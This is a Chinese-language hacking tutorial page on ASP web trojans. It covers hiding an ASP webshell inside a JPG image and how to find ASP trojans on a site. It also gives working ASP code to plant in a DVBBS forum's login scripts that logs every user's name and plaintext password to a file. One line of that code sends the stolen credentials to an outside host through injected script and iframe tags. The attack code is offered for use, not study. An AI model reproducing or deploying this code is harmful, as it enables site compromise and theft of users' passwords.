脚本之家 服务器常用软件
快捷导航
您的位置:主页 > 网络安全 > 安全教程 >

菜鸟是如何变成ASP木马高手的!

  发布时间:2009-06-09 11:28:18   作者:佚名   我要评论
1.名称:如何制作图片ASP木马   建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->   找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索<%和%>,将其变为00,(不要替

 WScript.Sleep 1000

  WshShell.SendKeys"^v"

  WshShell.SendKeys i

  WshShell.SendKeys "%s"

  Next

  8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可

  9. 名称:全面找出你站上的ASP木马

  (1) 用杀毒软件

  (2) 用FTP客户端软件,点"工具"->"比较文件夹"

  (3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马

  (4) 用工具Beyond Compare

  10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画

  (1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样

  老办法:

  修改admin_login.asp得到明文DVBBS后台密码

  在"username=trim(replace(request("username")这行后面

  Dim fsoObject

  Dim tsObject

  Set fsoObject = Server.createObject("Scripting.FileSystemObject")

  set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))

  tsObject.Write CStr(request("password"))

  Set fsoObject = Nothing

  Set tsObject = Nothing

  只要管理员登陆后台,在目录下就生成了laner.txt

  (2)login.asp中Case "login_chk"下:

  on error resume next

  Dim rain

  set rain=server.createobject("adodb.stream")

  rain.Type=2

  rain.CharSet="gb2312"

  rain.Position=rain.Size

  rain.Open

  rain.LoadFromFile server.MapPath("laner.asp")

  rain.writetext now&request("username")&"text:"&request("password")&chr(10)

  rain.SaveToFile server.MapPath("laner.asp"),2

  rain.Close

  set rain=nothing

  这样laner.asp将获得全部登陆人的登陆时间,用户名和密码

  (3)如果你有自己的网站或者另外的webshell(强烈建议使用):

  可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:

  <%if request("n")<>"" and request("p")<>"" then

  on error resume next

  Dim rain

  set rain=server.createobject("adodb.stream")

  rain.Type=2

  rain.CharSet="gb2312"

  rain.Position=rain.Size

  rain.Open

  rain.LoadFromFile server.MapPath("laner.asp")

  rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)

  rain.SaveToFile server.MapPath("laner.asp"),2

  rain.Close

  set rain=nothing

  end if%>

  11. 名称:利用QQ在线状态抓鸽子肉鸡

  生成qq在线状态,把里面的地址改成木马地址,发到论坛在login.asp那里插入一句:

  response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n="&request("username")&""&"&p="&request("password")&"></script>"response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request("username")&""&"&p="&request("password")&"></iframe>"

  结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里
上一页 1 23 4 下一页 阅读全文

相关文章

  • 教你成为ASP木马高手

    1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为<!--#i nclude file="ating.jpg"--> 找一个正常图片ating.jpg,插入一句话木
    2008-10-08

  • 4种最流行的木马捆绑器技巧

    一、传统的捆绑器   这种原理很简单,也是目前用的最多的一种。就是将B.exe附加到A.exe的末尾。这样当A.exe被执行的时候,B.exe也跟着执行了。这种捆绑器的代码是满
    2008-10-08

  • 木马免杀绝招以及常用的修改方法

    常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤: 第一步:用OD载入,来到程序的入口点。  ...常用的木马免杀方法 绝招一:快速搞定瑞星文件查杀 操作步骤:
    2009-03-07

  • Asp脚本木马技术

    现在很多的站点,为便于建站和后台管理,都使用ASP动态程序。但这也为整个站点的安全带来很大隐患,现在典型的网站攻击就是通过植入ASP木马,从而得到系统的控制权。早期的
    2008-10-08

  • 常见的木马所有隐藏启动方式总结

    木马的最大的特点之一就是它一定是要和系统一起启动而启动,否则它就完全失去了意义!下面为大家介绍一下它的几种隐藏启动的方法:   方法一:注册表启动项:这个大
    2008-10-08

  • 黑客必懂的木马连接原理

    目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马   正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才
    2008-10-08

  • 菜鸟必懂的木马连接原理

    目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马   正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才
    2008-10-08

  • 几招帮你识别和防御Web网页木马

    常见的网页木马攻击手段有哪些?用户应该如何识别及防御来自网页木马的攻击?笔者将在本文为用户细细道来:
    2015-09-21

  • 什么是恶意网站?详解2016最新的钓鱼、黑客入侵、木马病毒教程

    大家都知道恶意网站在我们平时上网的时候并不少见,最常见的就是扎起我们登录qq和百度网页中见到的一些,现在小编就为大家讲解2016年最新黑客入侵教程
    2016-08-24

  • 如何手工查找后门木马?手工查木马教程

    现在大多数电脑技术人开始学习防范技术了,因为现在防范技术比攻击技术要重要,下面就一起来看看如何手工查找后门木马吧
    2016-08-24

最新评论

关注微信公众号

扫一扫